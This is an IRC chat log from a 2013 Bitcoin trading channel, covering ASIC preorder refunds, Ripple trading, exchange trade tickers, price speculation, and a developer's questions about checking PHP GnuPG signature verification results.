making status updates in like... may. Feb 26 05:37:40 if they werent already Feb 26 05:37:45 mp wanted drama Feb 26 05:37:59 id have to ask josh to fuck up on this one, till my avalon arrives Feb 26 05:38:00 ya, ty bitcoin goddess, satisfactory dramadelivery. Feb 26 05:38:00 does bfl allow refunds? Feb 26 05:38:04 looks like i wont have to lol Feb 26 05:38:10 yeah, they do Feb 26 05:38:16 ouch Feb 26 05:38:19 but people who ordered way back then Feb 26 05:38:26 would not get their btc back Feb 26 05:38:27 they only allow refunds after jan 1st. Feb 26 05:38:39 oh even worse lol Feb 26 05:38:44 its like a stop loss order.. Feb 26 05:38:48 so if you ordered in 2013 you can get your money back Feb 26 05:38:53 well ya, you sent 500 btc in october, you get 200 btc back today. Feb 26 05:38:59 ick Feb 26 05:39:03 ^ 300 btc for bfl free Feb 26 05:39:03 lol Feb 26 05:39:11 nice biz huh. Feb 26 05:39:13 those low-weight no-ers on BFL bet will be pissed. Feb 26 05:39:38 kakobreklaa they thought they were smart :D Feb 26 05:39:41 its better to take a refund and take the loss.. before btc rallies up again Feb 26 05:39:53 rather than go all or nothing Feb 26 05:40:03 but they prolly wont do it. Feb 26 05:40:03 Bowjob nobody sensible has any money left with them anyway Feb 26 05:40:14 this is such a huge idiot trap Feb 26 05:40:15 a few hardocre believers aka idiots, who got burned in any scam available. Feb 26 05:40:20 starting with p[irate. Feb 26 05:40:27 some people just aren't made to handle money is all. Feb 26 05:40:31 i dodged all bullets so far lol Feb 26 05:40:31 like smarter people will get refunds Feb 26 05:40:43 and then BFL will sell to people Feb 26 05:40:48 and theyll all be late to the party Feb 26 05:40:57 making .0003 btc/day Feb 26 05:41:18 ThickAsThieves actually asic is only mining what, 4-5 th ? Feb 26 05:41:23 true Feb 26 05:41:24 and avalon is still in limboland Feb 26 05:41:29 .0003 BTC might be a bit exaggerated... but yeah Feb 26 05:41:31 asicminer is pretty behind it seems Feb 26 05:41:40 they said 12TH by the 1st i thought Feb 26 05:41:44 everyone's behind everyone else, this is like the asic olympics Feb 26 05:41:54 lol Feb 26 05:42:09 i tell you, if asics were girls i'd be damned worried Feb 26 05:42:14 everyone's late. Feb 26 05:42:24 haha Feb 26 05:42:40 "dude, i took my girlfriends to this party Feb 26 05:42:45 and now three weeks later everyone's late Feb 26 05:42:49 i dunno what we did there" Feb 26 05:43:23 *grin* Feb 26 05:43:29 i wonder how many people are submitting return requests tonight Feb 26 05:44:40 assbot would say, they are more fucked than whores at closin time Feb 26 05:44:45 lol Feb 26 05:45:14 josh says 1 week..(1 month) for this to be done Feb 26 05:45:51 do we know if people who won the BFL order number lottery have been contacted? Feb 26 05:46:49 ie, those that will get a 1st round unit Feb 26 05:46:51 doubtful, i think the first sign things are shipping is when they ask for people to send their trade-ins Feb 26 05:47:28 which is absent from this update Feb 26 05:49:29 cool, I guess there is still a chance of sprinkles on this shit sandwich Feb 26 05:50:24 I managed to sell 50k XRP for 1 BTC Feb 26 05:50:35 wat is xrp Feb 26 05:50:44 I don't know if I did something smart or stupid Feb 26 05:50:52 ripple credits Feb 26 05:50:59 [MPEX] [S.MPOE] 8355 @ 0.00075113 = 6.2757 BTC [-] Feb 26 05:53:22 There's 100 billion XRP created right off the bat Feb 26 05:53:32 at this point suppose knowing what ripple is might help Feb 26 05:53:33 Making XRP worth 2,000,000 BTC at that price Feb 26 05:53:41 So you sold them for a LOT Feb 26 05:53:56 XRP is super easily available Feb 26 05:54:38 is xrp unlimited? Feb 26 05:54:53 or just that 100bil only? Feb 26 05:55:18 100 bill, as money get sent around theres a small fee Feb 26 05:55:24 less than a cent Feb 26 05:57:57 I love how my ripple address ends by Sir N Feb 26 06:03:14 another lol for you https://bitcointalk.org/index.php?topic=146826.msg1558001#msg1558001 Feb 26 06:03:23 "Ill pay you 1BTC to buy the goldbar so I dont lose it" Feb 26 06:05:24 Hmm, I'll buy 10 million XRP for a BTC. Anyone? =P Feb 26 06:06:17 nam ill buy 50k xrp for .2 btc Feb 26 06:06:21 deal? :p Feb 26 06:08:06 nay =/ Feb 26 06:08:19 looks like it's overpriced right now Feb 26 06:08:28 I'll sell and wait to buy back Feb 26 06:08:57 What's your ripple name? Feb 26 06:10:06 rwAUfq4CjYut43iY8vut3KwujqFSGR1j5o Feb 26 06:10:10 ninjafruit Feb 26 06:10:50 im still trying to figure out how this thing works Feb 26 06:11:00 how do I view the ordebook Feb 26 06:13:25 yeah, I don't understand that either Feb 26 06:13:46 i'll just sit it out. i have 50k left Feb 26 06:13:51 lets see if this goes somewhere Feb 26 06:14:14 I want to see 1 XRP = 1 dollar Feb 26 06:15:56 good luck... would need market cap to reach 100 billion Feb 26 06:16:24 selling 50k ripples Feb 26 06:17:16 seems to be a firm ceiling at 30.40 at mtgox Feb 26 06:17:18 Ok, I don't know how it works at all... Feb 26 06:17:31 How do we get other currencies? Feb 26 06:22:24 well the rocket is simply refueling Feb 26 06:22:27 just wait Feb 26 06:22:31 I think I get it... Feb 26 06:22:35 arent ripples just IOUs mixed with otc ratings? Feb 26 06:22:49 or something Feb 26 06:22:51 People must assign trust to "gateways" which I think are like exchangers Feb 26 06:23:29 and these gateways assign currencies like USD/BTC/AUD/GBP/etc to users... and they can send it around if they trust the gateway... Feb 26 06:23:45 and people will treat it like Facebook Likes Feb 26 06:23:50 trust me and i'll trust you back Feb 26 06:24:00 So one has to deposit funds to a gateway to deposit it and withdraw from a gateway. Feb 26 06:24:30 I don't think it works like that Thick... Feb 26 06:24:51 [HAVELOCK] [HIM] 1 @ 16.9 BTC [+] Feb 26 06:25:21 [MPEX] [S.MPOE] 5132 @ 0.00075677 = 3.8837 BTC [+] Feb 26 06:25:23 [MPEX] [S.MPOE] 4468 @ 0.00076936 = 3.4375 BTC [+] Feb 26 06:25:25 Holee schitt Feb 26 06:25:30 Havelockkkkkkkk Feb 26 06:26:23 I remember when it was 12 BTCs Feb 26 06:26:23 i'm not sure how it works either, i just saw some people talking about that as one of the weaknesses Feb 26 06:26:37 and they released at 4.6 BTC per share Feb 26 06:26:40 jezzus Feb 26 06:30:56 aye Feb 26 06:31:11 Well BitPride/Ziggap going fast it seems =/ Feb 26 06:31:41 is ripple solidcoin 3? Feb 26 06:32:05 ripple isn't supposed to be a currency you trade for money Feb 26 06:32:30 they're supposed to be preminted token used to create orders in the system upon which they're destroyed. Feb 26 06:32:49 People are supposed to trade in a peer to peer fashion other currencies, like BTC/USD or stuff... Feb 26 06:33:02 or something like that I think Feb 26 06:34:02 http://www.reddit.com/r/Bitcoin/comments/197h9g/namecheap_considering_bitcoin/ Feb 26 06:34:16 top comment says they are gonna do it Feb 26 06:34:41 Good for them Feb 26 06:36:05 i'm down for the AUD end Feb 26 06:38:12 i was thinking about that other day Nam, i was even offering people access to the australian market in exchange for access to their countries market Feb 26 06:38:20 need to build a very trusted network Feb 26 06:38:39 while also taken care of the accountanting, tax side Feb 26 06:39:16 i'll also be working on peso next year, but doing AUD market for now. Feb 26 06:39:27 which peso? Feb 26 06:39:31 there are like 20 diff kinds Feb 26 06:39:32 ;) Feb 26 06:39:35 columbian? Feb 26 06:39:36 :P Feb 26 06:39:43 why do you think i said peso hehe Feb 26 06:39:55 of course i will share that infomation later on :) Feb 26 06:43:15 i dislike this whole cashing back out for fiat tho Feb 26 06:43:51 [HAVELOCK] [KCIM] 1 @ 1 BTC [+] Feb 26 06:44:49 nothing personal, just complicated things. Feb 26 06:44:55 s Feb 26 06:46:32 [BTCTC] [S.DICE-PT] 1875 @ 0.0061 = 11.4375 BTC [-] Feb 26 06:46:35 [BTCTC] [S.DICE-PT] 3000 @ 0.006 = 18 BTC [-] Feb 26 06:49:22 http://i.imgur.com/CaiOJXo.png wtf is this? 90k btc for 11k xrp? Feb 26 06:50:20 Hey I'll take that offer Feb 26 06:50:34 is that a fat finger or?? Feb 26 06:51:39 Do you trust the guy? No? Then don't accept the trade... Feb 26 06:51:59 Ripple doesn't hold any currency, the user does. Feb 26 06:52:10 I think it's supposed to be working with Gateways. Feb 26 06:53:32 Trusted gateways give you money on Ripple. You trust the gateway. The gateway give funds to the guy, who sells it to you. You withdraw at the gateway. Or from the guy if it's not issued by a gateway and you trust the person. Feb 26 06:53:51 whats a gateway Feb 26 06:53:54 I think it works basically with users issue BTC/USD/etc themselves Feb 26 06:54:06 and you trust money issued by certain users Feb 26 06:54:15 A gateway would be a trust user Feb 26 06:54:30 aka bitcoin agent Feb 26 06:54:39 broker Feb 26 06:54:41 etc Feb 26 06:54:43 ask Joel Katz on the forum, or something like that. Or look for it on the forum. I don't know much about how Ripple works exactly. Feb 26 06:55:43 Basically the thing is way too complicated for me to even want to mess around with it. Feb 26 06:56:00 bitcoin is already confusing to the general public Feb 26 06:56:09 now theres XRPs too Feb 26 06:56:10 lol Feb 26 06:56:13 I need to build a network of contact to find trade offers and have to find gateways I trust as a source to accept funds Feb 26 06:56:50 not that the concept is bad... but building itthe network from the grounds up would be considerable work... Feb 26 06:56:53 gateways taken offers at market price? Feb 26 06:57:01 what country are you in nam? Feb 26 06:58:03 [MPEX] [S.MPOE] 3450 @ 0.00076936 = 2.6543 BTC [+] Feb 26 06:58:43 Canada Feb 26 06:59:47 hmm Feb 26 07:01:39 are you buying and selling btc within canada atm? Feb 26 07:02:19 On occasions, yes Feb 26 07:05:54 mircea_popescu: sorry to be dicking around like that and asking already for a withdrawal just after depositing, but my funds are once again needed elsewhere. Feb 26 07:06:37 Sheesh, with all the BitVPS shares, S.DICE and other stuff I have, I don't have much capital laying around Feb 26 07:15:24 Also I placed 5120 S.DICE-PT for sal at 0.0062 if someone wanted to load up before the dividend. Feb 26 07:16:50 [HAVELOCK] [HIM] 1 @ 16.95 BTC [+] Feb 26 07:18:50 [HAVELOCK] [SDICE] 6 @ 0.675 = 4.05 BTC [+] Feb 26 07:18:52 [HAVELOCK] [SDICE] 4 @ 0.675 = 2.7 BTC [+] Feb 26 07:19:50 [HAVELOCK] [HIM] 1 @ 17 BTC [+] Feb 26 07:21:05 Just wtf is going on at Havelock lol Feb 26 07:21:31 ;;bc;stats Feb 26 07:21:32 Error: "bc;stats" is not a valid command. Feb 26 07:21:47 ;;bc,stats Feb 26 07:21:49 Current Blocks: 223169 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 606 blocks | Next Difficulty In About: 3 days, 1 hour, 27 minutes, and 16 seconds | Next Difficulty Estimate: 4373609.64927 | Estimated Percent Change: 19.79172 Feb 26 07:21:50 [HAVELOCK] [SDICE] 1 @ 0.678 BTC [+] Feb 26 07:22:01 ;;estimate Feb 26 07:22:11 Next difficulty estimate | 4373609.64927 based on data since last change | 4587789.77324 based on data for last three days Feb 26 07:22:51 [HAVELOCK] [SDICE] 1 @ 0.678 BTC [+] Feb 26 07:23:16 Havelock... the overpriced market... Feb 26 07:23:23 I want to arbitrage that =/ Feb 26 07:23:32 can say the same about mpex too this week Feb 26 07:23:41 aight Feb 26 07:25:34 Thank you mircea Feb 26 07:26:01 MPEx probably has the fastest withdrawal/deposit time for manual processing. Feb 26 07:27:52 Just wtf is going on at Havelock lol << what ? Feb 26 07:28:35 the HIM fund just went up crazy Feb 26 07:28:43 what's that even **** BEGIN LOGGING AT Tue Feb 26 15:12:00 2013 Feb 26 15:12:07 BitVPS is on BTCT.co, Ziggap is on BitFunder Feb 26 15:12:14 -NickServ- You failed to identify in time for the nickname mircea_popescu **** ENDING LOGGING AT Tue Feb 26 15:12:25 2013 **** BEGIN LOGGING AT Tue Feb 26 15:13:20 2013 Feb 26 15:13:27 Namworld: I'm not sure I get it, is 30BTC a fee, or do you get to use it after registering? Feb 26 15:13:38 It's a fee Feb 26 15:13:39 Eduard_Munteanu it's a fee. Feb 26 15:14:13 It goes into profits for the exchange and fees are distributed to MPOE holders Feb 26 15:14:17 I see. Feb 26 15:14:23 also, are you romanian ? Feb 26 15:14:33 mircea_popescu: yes :) Feb 26 15:14:39 haha cool. Feb 26 15:14:48 you're like the first i think.. Feb 26 15:15:05 Interesting. I think I got PMed by another one on #bitcoin. Feb 26 15:15:20 I don't remember the nick unfortunately. Feb 26 15:15:22 not in bitcoin, on mpex. Feb 26 15:15:30 Ah. Feb 26 15:15:53 I'm rather new to BTC as well. Feb 26 15:15:58 cool. Feb 26 15:15:59 (mircea is romanian too as you might have guessed by the name and happen to be MPEx's owner) Feb 26 15:16:16 ;;ticker Feb 26 15:16:16 BTCUSD ticker | Best bid: 31.40001, Best ask: 31.40100, Bid-ask spread: 0.00099, Last trade: 31.40100, 24 hour volume: 33370.91437260, 24 hour low: 30.07000, 24 hour high: 31.60000, 24 hour vwap: 30.66622 Feb 26 15:16:18 In case that wasn't clear. Feb 26 15:16:29 rally bitche Feb 26 15:16:29 s Feb 26 15:16:31 Yeah, I figured. :) Feb 26 15:16:57 Bowjob where's bugpowder's graphlines when you need them! Feb 26 15:17:15 mircea_popescu: I think I've seen you around #haskell lately? Not sure. Feb 26 15:17:25 possibly, for some values of lately. Feb 26 15:17:48 BFL fans developing Stockholm syndrome, its delicious Feb 26 15:17:56 lol quote Feb 26 15:19:25 anyway Eduard_Munteanu, you're like one of the few that can read this natively : Feb 26 15:19:25 http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/ Feb 26 15:21:47 mircea_popescu: yep... pretty cool business you got there. Are you from Bucharest? Feb 26 15:21:59 no. cluj originally, but i reside in timisoara. Feb 26 15:23:12 okay, queue flushed and i shall be back later. take care all. Feb 26 15:23:26 I was considering buying/selling some bitcoins locally, the spreads seem pretty high. Feb 26 15:24:31 The best way to get market rate is bank transfer to an exchange Feb 26 15:24:45 Namworld: ah, no, I'm interested in making money :) Feb 26 15:24:57 Hehehe Feb 26 15:25:03 trade locally, buy low, sell high Feb 26 15:25:08 Yup Feb 26 15:25:21 especially if people are in need of fiat Feb 26 15:25:29 Anyway, I need to sell quite a few Pecunix to get some BTCs first. Feb 26 15:25:47 What is that Eduard? Feb 26 15:25:54 local ecurrency? Feb 26 15:26:08 Bicknellski: no, an ecurrency equivalent to a gram of gold Feb 26 15:26:16 I googled it Feb 26 15:26:18 thanks.. Feb 26 15:26:34 Eduard: be wary however. Feb 26 15:26:50 Namworld: of local trading? Feb 26 15:27:06 No, the BTC price raised by over 100% in the last two months Feb 26 15:27:24 It might not keep it's worth for long. BTC is volatile. Feb 26 15:27:33 Yeah, I know. I'd like to wait a bit and see if it crashes. Feb 26 15:27:36 It goes up and down wildly with news. Feb 26 15:27:55 other than that, the global picture is a slow and steady raise. Feb 26 15:28:13 The demand might be gone after the ASICs are sold. Feb 26 15:28:59 same here... but the bubble seems to be more of a new normal Feb 26 15:29:00 Also be wary, many BTC stocks end up being scams or perform poorly. Feb 26 15:29:42 there is a lot more money in than the last time when it tanked Feb 26 15:31:04 But I think you are right local trading is a very good way to go Feb 26 15:31:12 just finding BTC locally is a hard one Feb 26 15:31:13 Lots of investigation required. There's occasional opportunities that open, usually best flipping it right back. Feb 26 15:31:18 at least for me anyhow Feb 26 15:31:49 The spreads are huge, the only ones selling are doing it for $37/BTC. Feb 26 15:31:56 ouch Feb 26 15:32:37 Anyone ever heard of a local trade 'gone wrong'? Feb 26 15:32:45 id sell at 37 $ :) Feb 26 15:33:06 I didn't... but that might have happened. Feb 26 15:33:13 no, but i bet people will get mugged over it one of these days Feb 26 15:33:36 make sure to meet in a bank loby or something, lol Feb 26 15:33:46 Good thing we don't carry BTCs around in our wallets. Feb 26 15:34:09 i do Feb 26 15:34:29 kakobrekla: cool, some BTC-denominated card? Feb 26 15:34:53 cas coin and some home made priv keys printed as bank note Feb 26 15:35:13 Interesting. Feb 26 15:35:25 That's one way to print your own notes. Feb 26 15:35:43 BTC rules. Feb 26 15:39:43 Namworld: do you have fancier stuff like options or shorting? Feb 26 15:40:21 No, unfortunatly. Not easy to set up. Feb 26 15:40:51 Yeah. Also I suppose shorting is risky for the lender. Feb 26 15:40:53 I can broker options manually on request. Feb 26 15:41:16 Yes, I don't lend my assets. Feb 26 15:41:26 Yes, I don't lend my ass. Feb 26 15:43:56 selfish lovers Feb 26 15:44:52 ;;asks 32 Feb 26 15:44:53 There are currently 11216.171 bitcoins offered at or under 32.0 USD, worth 357926.122005 USD in total. Feb 26 15:45:20 We'll break the all time high at this rate... Feb 26 15:46:32 what psychological impact will that have? I would guess short term dumping by a steady rise, if the dumps aren't maintained Feb 26 15:46:45 followed by* Feb 26 15:47:29 would like to see a dump around 32.69ish, then buy back in a few dollars cheaper if possible. Feb 26 15:47:30 I'd be more for extreme frenzy of old followed by a steep decline. Feb 26 15:47:32 so impossible to know Feb 26 15:48:05 frenzy of old? Feb 26 15:48:22 in 2011 Feb 26 15:48:37 Where for a short time it really skyrocketed. Feb 26 15:49:10 this rise has been slightly more metered. Feb 26 15:50:00 perhaps... Feb 26 15:51:56 anyone know the odds for this site? http://kingco.in/ Feb 26 15:52:38 i dont mind us staying under it for a month, then i giant break out to $50 Feb 26 15:53:12 yeah well Feb 26 15:53:16 a lot of people is saying that Feb 26 15:53:21 the odds are not in your favor Feb 26 15:53:24 ;) Feb 26 15:53:25 lucky theres always dubasses that dump Feb 26 15:54:53 abra, im sure, but im up 120% just testing it Feb 26 15:56:31 I think the dumbasses are the ones mass buying currently. Feb 26 15:56:59 sell all you have then Feb 26 15:57:40 I'm not selling. On the very long term, I'm long. But in the short term, I'm short after such a large rise. Feb 26 15:58:06 I wish I could short BTC right now. Feb 26 15:58:11 I got BTC placed in USD based income businesses. Feb 26 16:01:30 lol Feb 26 16:01:33 bfl bet rehashed Feb 26 16:01:33 http://bitbet.us/bet/261/bfl-will-deliver-asic-devices-before-march-15th/ Feb 26 16:02:15 this time im not the author tho Feb 26 16:03:05 belivers went quiet? Feb 26 16:05:53 http://www.bbc.co.uk/news/business-21589128 Bank Of England considering negative interest rates Feb 26 16:06:16 we don't want your money Feb 26 16:06:46 ThickAsThieves: I'm cool with that as long as they don't lend my money Feb 26 16:06:57 someone was here a while ago saying they bought on credit cards Feb 26 16:07:02 Man I have to buy some BTC soon no matter what yuk! Feb 26 16:07:03 That's how full reserve should work. Otherwise, no way, GTFO. :) Feb 26 16:08:30 If the interest rate doesn't cover the inflation, you're probably better off keeping your money in a warehouse, safe deposit box, full reserve bank, some other currency etc. Feb 26 16:10:21 Bank Of England considering negative interest rates (Freicoin) Feb 26 16:10:42 :) Feb 26 16:13:29 BFL is so fubar Feb 26 16:13:35 negative interest rates? lol Feb 26 16:21:38 Awesome right Feb 26 16:21:46 spread the wealth people... Feb 26 16:21:47 lol if banks don't know what to do with money, why not fund long term infrastructure/scientific development.. Feb 26 16:21:51 ...but that doesn't look good on quarterly report, yeah Feb 26 16:22:05 The money is broken Feb 26 16:22:08 ;) Feb 26 16:24:58 [MPEX] [S.MPOE] 7900 @ 0.00076482 = 6.0421 BTC [-] Feb 26 16:25:06 the money is broken, lol. Feb 26 16:25:15 very broken Feb 26 16:25:30 Yup Feb 26 16:25:35 ... hahaha Feb 26 16:33:22 Who needs banks when you have BITCOIN! :) Feb 26 16:34:10 You said you were new but seem to already have catched the Bitcoin bug. Feb 26 16:34:22 [MPEX] [S.MPOE] 1084 @ 0.00076482 = 0.8291 BTC [-] Feb 26 16:35:26 Namworld: indeed, quite fun Feb 26 16:35:59 Namworld: Feb 26 16:36:08 yt? Feb 26 16:36:24 hmm... what's yt? Feb 26 16:36:52 you there? Feb 26 16:37:01 ;;bc,stats Feb 26 16:37:04 Current Blocks: 223218 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 557 blocks | Next Difficulty In About: 3 days, 6 hours, 38 minutes, and 7 seconds | Next Difficulty Estimate: 4316094.45818 | Estimated Percent Change: 18.2164 Feb 26 16:37:10 ah. Well obviously since I talked two minutes ago. Feb 26 16:37:26 Eduard: then you might appreciate this tool I've made: http://namcdn.com/btcalarm/ Feb 26 16:37:37 4316094.45818 vs 3651011.630693214 Feb 26 16:37:40 I use it to wake up when price moves on MtGox Feb 26 16:37:51 Hm, interesting, thanks. Feb 26 16:38:01 thestringpuller, what did you want? Feb 26 16:38:37 Doctor SP. Feb 26 16:39:42 a vps and a new domain name Feb 26 16:39:46 for another project Feb 26 16:40:15 Ah, I see. Feb 26 16:40:33 You will need to wait for Arij or Phungus to be around to set up a VPS. Feb 26 16:46:53 when would that bd Feb 26 16:46:56 be* Feb 26 16:49:08 You have an order up on bitvps.com? Feb 26 16:49:45 Should be set somewhere this afternoon/evening then. Feb 26 16:54:04 Hmm, nothing else? Feb 26 16:54:56 I'm off for now. Feb 26 17:46:16 !ticker m O.BTCUSD.C310T Feb 26 17:46:18 [MPEX:O.BTCUSD.C310T] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.25778105 / 0.25819404 / 0.28103279 (563 shares, 145.36 BTC), 30D: 0.25778105 / 0.25819404 / 0.28103279 (563 shares, 145.36 BTC) Feb 26 17:46:45 !ticker m O.BTCUSD.C350T Feb 26 17:46:47 [MPEX:O.BTCUSD.C350T] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.2057493 / 0.2057493 / 0.2057493 (916 shares, 188.47 BTC), 30D: 0.2057493 / 0.2057493 / 0.2057493 (916 shares, 188.47 BTC) Feb 26 17:57:51 [HAVELOCK] [SDICE] 2 @ 0.68 = 1.36 BTC [+] Feb 26 18:02:56 [MPEX] [S.MPOE] 1816 @ 0.00076391 = 1.3873 BTC [-] Feb 26 18:02:58 [MPEX] [S.MPOE] 6645 @ 0.00076935 = 5.1123 BTC [+] Feb 26 18:03:02 [MPEX] [S.MPOE] 17489 @ 0.00076936 = 13.4553 BTC [+] Feb 26 18:58:26 ;;ticker Feb 26 18:58:26 BTCUSD ticker | Best bid: 31.01298, Best ask: 31.03999, Bid-ask spread: 0.02701, Last trade: 31.03999, 24 hour volume: 39955.84230975, 24 hour low: 30.11000, 24 hour high: 31.69900, 24 hour vwap: 30.85183 Feb 26 18:58:38 ;;bc,24prc Feb 26 18:58:38 Error: "bc,24prc" is not a valid command. Feb 26 18:58:44 ;;bc,24hprc Feb 26 18:58:44 30.80 Feb 26 18:59:28 Updated volume and profit statements for ZIGGAP released on it's BitFunder description page Feb 26 19:05:49 thx Feb 26 19:19:40 [MPEX] [S.DICE] 1000 @ 0.00629175 = 6.2918 BTC [-] Feb 26 19:19:42 [MPEX] [S.DICE] 700 @ 0.00629176 = 4.4042 BTC [+] Feb 26 19:24:59 [BTCTC] [S.MPOE-PT] 1000 @ 0.00071 = 0.71 BTC [-] Feb 26 19:25:59 [BTCTC] [S.MPOE-PT] 1055 @ 0.0007 = 0.7385 BTC [-] Feb 26 19:30:41 anyone used php's gpg extensiosn? when i gnupg_verify, i get a "validity" field in the result, that seems to be 0 for failed, or 4 for valid... but i have no clue what the 4 means, or if i should accept 1,2,3,4,etc as valid as well? Feb 26 19:32:15 On success, this function returns information about the signature. On failure, this function returns FALSE. Feb 26 19:32:33 so maybe any integer returned is ok Feb 26 19:32:50 http://www.php.net/manual/en/function.gnupg-verify.php Feb 26 19:33:16 failure doesnt mean signature invalid Feb 26 19:33:32 an invalid signature still returns the array of information about the sig Feb 26 19:33:56 ahh, well too bad its not like perl where you can just look in the PM to find what's what. Feb 26 19:35:53 {"fingerprint":"8DDE8C2B4DE2278A95C3D65B9214FC6BF1B69921","validity":4,"timestamp":1361385050,"status":0,"summary":3} Feb 26 19:35:57 it returns things like that Feb 26 19:36:17 i have no clue what status, summary, or validity values are Feb 26 19:36:44 what does it say if you make it fail Feb 26 19:37:16 {"fingerprint":"9214FC6BF1B69921","validity":0,"timestamp":0,"status":117440520,"summary":4} Feb 26 19:38:06 hmm. so if validity is > 0 you're ok? Feb 26 19:38:22 thats what i'd like to really be sure of.. not really something i can ASSUME Feb 26 19:38:30 fair enough Feb 26 19:38:35 im making a way to automatically push assets from MPEX to Havelock, simply by pasting in a PUSH receipt Feb 26 19:40:46 i remember you saying this before. Feb 26 19:41:48 i don't know how one does that. In my mind, person A owns 1 share of XYZ and he can push to another key on the MPEx keyring (weather it exists on the keyring or not) ... but how does one push this to a remote keyring? Feb 26 19:42:29 i would think that i'd have to be different to discern who person A is on the remote system and just dump the 1 XYZ in there, while keeping the 1 XYZ in holdings on MPEx Feb 26 19:42:48 s/i'd/it'd/ Feb 26 19:43:01 yes, you would push it from your mpex account to the havelock mpex account Feb 26 19:43:20 then paste the push receipt into the havelock website, which would verify 6 things: Feb 26 19:44:01 but how? i mean, on mpex its just like "PUSH|MPSIC|LONGKEYFINGERPRINT|QTY" Feb 26 19:44:08 how do you specify a destination? Feb 26 19:44:22 OH Feb 26 19:44:38 ok... so with the receipt you just parse that on the remote end and use that to verify. Feb 26 19:44:46 //1 valid signature Feb 26 19:44:46 //2 that its actually from mpex (fingerprint?) Feb 26 19:44:46 //3 that its a receipt we have not processed already Feb 26 19:44:46 //4 that its a push receipt to havelock account Feb 26 19:44:46 //5 that we recognize what was pushed Feb 26 19:44:46 //6 that the quantity if what was pushed is ok Feb 26 19:44:51 yeah, this could get hairy dude. Feb 26 19:45:36 its actually very straightforward Feb 26 19:45:41 and secure Feb 26 19:45:57 good luck :) Feb 26 19:46:02 as long as one can trust and properly interpret the result from gnupg_verify() Feb 26 19:49:50 yeah, seems like if you could know for certain about 1-6 it could work pretty good. could reek havoc though if there was any problems. Feb 26 19:53:07 when i launch it, it'll go through a manual approval step for the first little while, just to make sure :) Feb 26 19:53:51 but from my understanding, it should work just fine, i ran it by mp too and he seemed to think it should work well Feb 26 20:01:17 yeah it seems like it could work out decent. doing it manually in tandom for a while would be good to ensure that the correct values get to the correct accounts, etc. Feb 26 20:02:27 its shitty when neat-o libraries don't define their return statements, nor can they be correlated to a given spec. Feb 26 20:02:36 [BTCTC] [ESECURITYSABTC] 1 @ 0.64798 BTC [+] Feb 26 20:02:46 at least not easily found or whatever :/ Feb 26 20:03:20 back to the first statement: On success, this function returns information about the signature. On failure, this function returns FALSE. Feb 26 20:03:28 [BTCTC] [BTC-BOND] 25 @ 0.01 = 0.25 BTC [+] Feb 26 20:03:34 i'd be nice to know what {1,2,3,4...} are for! lol Feb 26 20:03:47 [BTCTC] [COGNITIVE] 1 @ 0.33 BTC [+] Feb 26 20:06:14 hahaha Feb 26 20:06:16 If verification fails, the gnupg_verify() returns the key's id instead of fingerprint . It does not return FALSE as stated above (PHP4, have not tested PHP5). You can compare it with result of keyinfo: Feb 26 20:06:31 http://www.php.net/manual/en/function.gnupg-verify.php#89192 Feb 26 20:06:53 so much for returning FALSE Feb 26 20:07:06 yea Feb 26 20:07:13 thats what i said, it always returns an array Feb 26 20:07:20 unless the function itself completely fails for some reason Feb 26 20:07:40 its just checking the values from the returned array (esp the "validity" field) that i need to be 100% sure about Feb 26 20:07:56 yeah, i see. Feb 26 20:10:08 this seems like it could work pretty good with some testing Feb 26 20:13:59 not sure how much demand there would be... its possible now, for free, just manaually processed, and nobody has taken advantage of it yet Feb 26 20:14:31 but for the naysayers that think im "hogging all the arbitrage" as i add more units to havelock.. it'll satisfy them at least (give them the opportunity to do the same arbitrage) Feb 26 20:22:44 [BTCTC] [COGNITIVE] 1 @ 0.3449 BTC [+] Feb 26 20:26:21 topace: yeah, seems like it would be some good arbitrage oppertunities -- im sure with this automated demand would pick up over time. Feb 26 20:26:54 :] Feb 26 20:28:37 We're not engaged in a currency war. Feb 26 20:28:40 o rly? Feb 26 20:29:10 http://video.cnbc.com/gallery/?play=1&video=3000150533 Feb 26 20:29:28 ALL YOUR BASE ARE BELONG TO US Feb 26 20:38:41 top, i didnt know you did that Feb 26 20:38:53 facilitate buys from mpex Feb 26 20:39:03 so i used other exchanges in the past Feb 26 20:39:12 i started on havelock Feb 26 20:39:58 but to be fair, I didn't know anyone did it til Deadterra Feb 26 20:41:16 why wouldn't you just hog all the arbitrage if you have the ability? Feb 26 20:44:15 ThickAsThieves: yea havelock launched teh SDICE passthru beginning of January Feb 26 20:44:44 and we allow users to push existing holdings from mpex to havelock, or from havelock back to mpex Feb 26 20:46:03 ThickAsThieves: i dont mind hogging all the arbitrage at all, but its kind of a conflict of interest since i run the site... if my goal is simply arbitrage at least... which it hasnt been since we launched.. my goal has been to grow the sdice holdings on havelock, and the only way to do that is to buy on mpex and sell the units on havelcok, so the arbitrage is a added side-benifit to me. Feb 26 20:46:33 i move things at break-even often, so no profit from the arbitrage at all Feb 26 20:46:37 just to get more units onto havelock Feb 26 20:47:00 the 5% cut being plenty Feb 26 20:47:09 make sense Feb 26 20:48:08 but the more liquid the better, so if its easier for others to do the arbitrage as well, im all for that Feb 26 20:48:17 thus, why i want to setup this automatic push system Feb 26 20:48:24 instead of having to manually process push requests Feb 26 20:49:19 but this would only be for people who have an mpex account right Feb 26 20:49:23 [MPEX] [S.DICE] 2000 @ 0.00634999 = 12.7 BTC [+] Feb 26 20:49:24 [MPEX] [S.DICE] 3000 @ 0.00635 = 19.05 BTC [+] Feb 26 20:49:35 the feature you are developing, I mean Feb 26 20:49:51 [HAVELOCK] [SDICE] 24 @ 0.640001 = 15.36 BTC [-] Feb 26 20:49:53 [HAVELOCK] [SDICE] 2 @ 0.64000002 = 1.28 BTC [-] Feb 26 20:49:54 [HAVELOCK] [SDICE] 15 @ 0.64000001 = 9.6 BTC [-] Feb 26 20:49:54 [HAVELOCK] [SDICE] 9 @ 0.64 = 5.76 BTC [-] Feb 26 20:49:55 i need to just get an mpex account already Feb 26 20:50:09 yea exactly, it would only work if you also had an mpex account Feb 26 20:50:27 or, had someone with an mpex account willing to purchase/push on you rbehalf (others here have made that offer to people before i've seen) Feb 26 20:50:48 ah, thats what I was referring to with deadterra Feb 26 20:51:07 buying on mpex for me and pushing to BF Feb 26 20:51:35 yea.. i'd do that for havelock users too, if im around Feb 26 